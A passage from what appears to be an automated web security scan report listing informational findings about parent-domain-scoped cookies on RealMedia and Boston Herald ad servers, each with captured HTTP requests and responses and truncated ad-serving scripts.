Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:18:17 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.117. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O8016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:23:08 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O8016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:14:10 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.118. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O1012Mr|O2016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:55 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O1012Mr|O2016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:57 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.119. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:02:23 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:53:25 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.120. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:19:01 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:10:03 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.121. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O4016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:16 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5l|O10M69|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:18 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.122. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; RMFD=011PiwK1O1016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:41 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O1012Mr|O1016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3045525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:43 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.123. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:10:47 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O5016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:01:49 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.124. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M69|O1012Mr|O1016F7|O6016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:14:54 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O6016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:05:56 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

10.125. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:28 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW801DO8gACNo5; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...

10.126. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:29 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW801DO8kADVvc; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n')
...[SNIP]...

10.127. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@x01!x01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@x01!x01

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@x01!x01 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:32 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 500
Content-Type: application/x-javascript

document.write ('<!-- begin ZEDO for channel: Herald Interactive - ROS , publisher: Herald Interactive , Ad Dimension: Pixel/Popup - 1 x 1 -->\n');
document.write ('<iframe src="http://d3.zedo.com/jsc
...[SNIP]...

10.128. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
